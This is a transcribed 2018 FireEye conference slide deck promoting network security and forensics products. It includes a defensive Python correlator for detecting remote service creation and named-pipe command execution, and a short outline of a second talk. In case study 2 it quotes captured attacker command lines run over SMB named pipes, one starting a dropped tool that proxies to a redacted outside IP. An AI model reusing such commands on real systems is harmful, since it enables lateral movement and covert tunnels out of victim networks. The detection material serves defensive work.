Defending Against Evolving Network Security Threats
©2018 FireEye
Network Security Today
• Sophisticated: hiding in plain sight, credential reuse, rapid evasion creation
• Persistent: targeted, innovative, customized
• Professional: determined, organized, well funded
• 101 Days: average days before a breach was detected*
• $3.62M: average cost of a breach**
Compounding Factors: Threat Actors aren’t the Only Challenge
• Lack of resources to quickly and effectively address threats
• Lack of visibility into traffic as networks expand
Driving the need to reduce dwell time and limit exposure
New Developments in Network Security
• Network Security (NX 6500) & Smart Grid (VX 12550)
• File & Content Security (FX 6500)
• Network Forensics (PX/IA)
• SmartVision
Network Security Topology (diagram): a data center DMZ behind a router, NG firewall and switch; Engineering, HR and Marketing segments; private and public zones hosting Web, DNS, App, Email and File servers. Placements shown: Network Security (NX) and vNX, File Content Security (FX), SmartVision, Email Security, Endpoint Security, Mobile, Central Management, IA and PX.
New Developments in Network Security (NX & FX)
“Five Styles of Advanced Threat Defense Framework” (highlighted here: Payload Analysis)
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
Network Security 5th Generation Portfolio
Appliances: NX 6500, NX 5500, NX 4500, NX 4400, NX 3500, NX 2500, NX 1500, NX 2550; VX 12550 and VX 5500 (MVX Smart Grid); Cloud MVX
• GREATER STORAGE: 2x storage to hold more metadata and alerts
• GREATER VALUE: new 5th generation appliances set a new standard for price/performance; SSL Intercept
• GREATER PORT DENSITY: twice the port density provides greater flexibility and scalability as networks grow
• NEW: 10Gbps
• ADVANCED DETECTION: ML modules for exfil detection, SSL beaconing and fingerprinting, MalwareGuard analysis
Malware that Targets Files and Content (File Protect FX 6500)
• Detect and block malware in file shares and content stores
• Detects advanced malware that bypasses AV
• Optimized for SharePoint and OneDrive
(Diagram: infected file, end users, data center file share/data store, File Protect FX 6500.)
New Developments in Network Forensics
“Five Styles of Advanced Threat Defense Framework” (highlighted here: Network Forensics)
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
FireEye Network Forensics – A Complete Solution
◆ Packet capture (PX) – a “security camera” to record and replay network traffic and flows
▶ What happened?
▶ What was involved?
▶ What was taken?
◆ Investigation Analysis (IA) – a source to manage multiple “security cameras”
◆ A tool that correlates events and asks questions:
“How many times in the last three months did this guy….. with the red hat and the dark beard….. appear on any of our cameras….. while carrying a brown briefcase?”
Detect a broad array of security incidents, improve the quality of your response and precisely quantify the impact of each incident.
High-Performance Packet Capture That Grows with Your Network; High-Fidelity Data Analysis
• THREAT HUNTING: perform retrospective threat hunting and analysis
• EXTENSIVE VISIBILITY: session decoder support for a myriad of protocols & file types
• FLEXIBLE PLATFORM: scales to meet distributed and large enterprise needs; subscription pricing and expandable storage licenses
• HIGH-PERFORMANCE: record speeds of up to 20Gbps
• LOSSLESS PACKET CAPTURE: vital to effective network forensic investigations
• INTELLIGENT CAPTURE: selective packet filtering for maximum efficiency
• ULTRAFAST SEARCH: leverage unique indexing architecture for fast answers
• EASY DRILL DOWN: quickly respond to alerts that matter
• INTEGRATED INTEL: add rich context to IOCs and alerts
New Developments – SmartVision
“Five Styles of Advanced Threat Defense Framework” (highlighted here: Network Traffic Analysis)
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
Anatomy of the Attack Life Cycle
Stages: Initial Recon → Initial Compromise → Establish Foothold → Escalate Privileges → Internal Recon → Move Laterally → Maintain Presence → Complete Mission
Activity called out on the slide as visible on the network during these stages:
• Maintain Presence: use of persistence mechanisms, such as Volume Boot Record (VBR) modification
• Files and objects moved over Windows SMB protocols
• Unusual file transfer activity from ADMIN
• Network mapping, host & service enumeration, user hunting
• Installation of fileless malware such as Mimikatz
• Malware download, C&C
SmartVision – Demonstration
Why SmartVision
◆ Born from real-world investigation monitoring
◆ Attackers consistently find ways around existing security controls
◆ Once inside, attackers must leverage the existing environment to access systems
◆ Lack of investment by attackers in novel lateral movement
◆ Well-defined protocols used differently by attackers and administrators
Enterprise Network Architecture with SmartVision (diagram): a data center behind a router, firewall and switch, with Engineering, HR and Marketing segments and File, App, Email and DNS servers; a remote office; a PCI network and a SCADA network. SmartVision sensors are placed on each of these segments; an NX appliance is also shown.
SmartVision Internals
◆ Monitor internal protocols for base events:
▶ SMB, SMB2, DCERPC, WinRM
◆ Record protocol metadata for triage review:
▶ DNS, HTTP, TLS, RTSP, SIP, SSH, SMTP, POP3, RDP, SMB, SMB2, DCERPC, IRC
◆ Correlate individual “base” events as they occur
◆ Some “base” events are definitively evil
◆ Other “base” events require correlation
SmartVision Example Correlation
◆ Remote Service Created and Started
▶ ROpenSCManagerW
▶ RCreateServiceW OR RCreateServiceWOW64W
▶ RStartServiceW
▶ RDeleteService (optionally)
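The two ideas on the preceding slides (some base events are "definitively evil" on their own, others only mean something once correlated) are easy to show as code. The following is an added example written for this page, not SmartVision's or FireEye's own code: a toy correlator that consumes per-protocol base events and raises "Remote Service Created and Started" when the svcctl sequence above completes for one client/server pair within a time window, annotating the alert if an RDeleteService follows. The event schema, the 300-second window, the sample addresses and the named-pipe heuristic (a WRITE to \PIPE\ carrying a command line, modelled on case study 2 below) are all assumptions made for the illustration.

```python
# Added example (not FireEye/SmartVision code). Event schema, window length,
# addresses and the named-pipe heuristic are assumptions for illustration.
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class BaseEvent:
    """One protocol-level observation from a sensor (constructed schema)."""
    ts: float          # seconds since capture start
    src: str           # client IP
    dst: str           # server IP
    proto: str         # "DCERPC", "SMB2", ...
    op: str            # operation name, e.g. the svcctl call "RStartServiceW"
    detail: str = ""   # free-form metadata (service name, pipe payload, ...)


@dataclass
class Alert:
    name: str
    src: str
    dst: str
    first_ts: float
    last_ts: float
    evidence: List[BaseEvent] = field(default_factory=list)


# Ordered svcctl calls that together mean "Remote Service Created and Started".
# Either CreateService variant satisfies step two; RDeleteService afterwards is
# optional cleanup and only annotates an alert that has already fired.
SERVICE_SEQUENCE = (
    {"ROpenSCManagerW"},
    {"RCreateServiceW", "RCreateServiceWOW64W"},
    {"RStartServiceW"},
)
CLEANUP_OP = "RDeleteService"


class Correlator:
    def __init__(self, window_seconds: float = 300.0):
        self.window = window_seconds
        # per (src, dst): events matched so far against SERVICE_SEQUENCE
        self._chains: Dict[Tuple[str, str], List[BaseEvent]] = defaultdict(list)
        # per (src, dst): fired alert still eligible for the cleanup annotation
        self._awaiting_cleanup: Dict[Tuple[str, str], Alert] = {}
        self.alerts: List[Alert] = []

    @staticmethod
    def _is_definitively_evil(ev: BaseEvent) -> bool:
        """Single events needing no correlation: a command line written into
        an IPC$ named pipe (assumed heuristic, modelled on case study 2)."""
        return (ev.proto == "SMB2" and ev.op == "WRITE"
                and ev.detail.startswith("\\PIPE\\")
                and "cmd /c" in ev.detail.lower())

    def ingest(self, ev: BaseEvent) -> Optional[Alert]:
        """Feed one base event; return the alert it completed, if any."""
        if self._is_definitively_evil(ev):
            alert = Alert("Remote command execution via SMB named pipe",
                          ev.src, ev.dst, ev.ts, ev.ts, [ev])
            self.alerts.append(alert)
            return alert
        if ev.proto != "DCERPC":
            return None                       # other protocols: metadata only
        key = (ev.src, ev.dst)
        if ev.op == CLEANUP_OP:
            pending = self._awaiting_cleanup.pop(key, None)
            if pending is not None and ev.ts - pending.last_ts <= self.window:
                pending.name += " (service deleted afterwards)"
                pending.last_ts = ev.ts
                pending.evidence.append(ev)
            return None
        chain = self._chains[key]
        if chain and ev.ts - chain[0].ts > self.window:
            chain.clear()                     # too slow to be one action; restart
        step = len(chain)
        if step < len(SERVICE_SEQUENCE) and ev.op in SERVICE_SEQUENCE[step]:
            chain.append(ev)
        if len(chain) == len(SERVICE_SEQUENCE):
            alert = Alert("Remote Service Created and Started",
                          ev.src, ev.dst, chain[0].ts, ev.ts, list(chain))
            self.alerts.append(alert)
            self._awaiting_cleanup[key] = alert
            chain.clear()
            return alert
        return None


def correlate(events: List[BaseEvent]) -> List[Alert]:
    """Run a fresh correlator over a stream and return all alerts raised."""
    c = Correlator()
    for ev in sorted(events, key=lambda e: e.ts):
        c.ingest(ev)
    return c.alerts


# Constructed sample stream (addresses, service name and payload are made up).
SAMPLE_EVENTS = [
    BaseEvent(0.0, "10.0.0.5", "10.0.0.10", "DCERPC", "ROpenSCManagerW"),
    BaseEvent(0.4, "10.0.0.5", "10.0.0.10", "DCERPC", "RCreateServiceW", "svc=wupd"),
    BaseEvent(0.9, "10.0.0.5", "10.0.0.10", "DCERPC", "RStartServiceW", "svc=wupd"),
    BaseEvent(12.0, "10.0.0.5", "10.0.0.10", "DCERPC", "RDeleteService", "svc=wupd"),
    # an administrator listing services: opens the SCM but never creates one
    BaseEvent(20.0, "10.0.0.7", "10.0.0.10", "DCERPC", "ROpenSCManagerW"),
    BaseEvent(20.5, "10.0.0.7", "10.0.0.10", "DCERPC", "REnumServicesStatusW"),
    # single definitively-evil event: command line pushed through a named pipe
    BaseEvent(33.0, "10.0.0.5", "10.0.0.11", "SMB2", "WRITE",
              '\\PIPE\\ cmd /c "start c:\\windows\\temp\\tool.exe"'),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a.first_ts:6.1f}s {a.src} -> {a.dst}: {a.name} "
              f"({len(a.evidence)} base events)")
```

Run as a script it reports two alerts for the sample stream and none for the administrator's pair, which is the point of the slide: the same ROpenSCManagerW call is benign from an admin and suspicious only as the first step of a chain. Each Alert keeps the base events that produced it, so the triage view the later case studies describe (metadata per base event under each high-level alert) falls out of the data structure.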
Case Study 1: Credential Dumping
◆ Mandiant responds to an incident
◆ Active attacker targeting a consulting firm
◆ Attacker is attempting to access data concerning the consulting firm’s clients
◆ Mandiant deploys SmartVision sensors to critical network segments
Case Study 1: Credential Dumping
◆ Base events are visible for each high-level alert
◆ Base events contain their own metadata, which is available for analysis
Case Study 2: Lateral Movement
◆ IT provider. Initial intrusion happened before start of “Proof-of-Concept”
◆ Attacker using VPN to access the environment. No backdoors.
◆ SmartVision recorded lateral movement and remote command execution on systems
Captured SMB named-pipe traffic (excerpt; non-printable bytes omitted): writes to \\AD-SERVER-IP-REDACTED\IPC$ over \PIPE\ carrying the command lines
cmd /c "start c:\windows\temp\sk.exe -proxy CHINESE-IP-REDACTED 443 8099"
cmd /c "start c:\windows\temp\p.exe -s 8087 -dir c:\win
Case Study 3: Reconnaissance + Remote Execution
◆ Car manufacturer
◆ BADRABBIT ransomware deployed to select systems
◆ Reconnaissance activity on servers during the ransomware attack
SmartVision Roadmap
◆ More correlation rules
◆ More protocols supported
◆ Unsupervised machine learning
◆ User-interface improvements for quick alert triage
Thank You
OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.
Practical Experience: Best Practice Guidance. Brian Barnett, CEO, Luz Technologies
Who We Are
Common Challenges to Our Methods
Things We’ve Actually Heard
The Importance of Perimeter Complexity
What We Look For
How We Leverage NX Technology
Best Practice Guidance
The Inside Threat
Eggs In One Basket
Kinetic vs Persistent
Thank You. Brian Barnett, CEO, Luz Technologies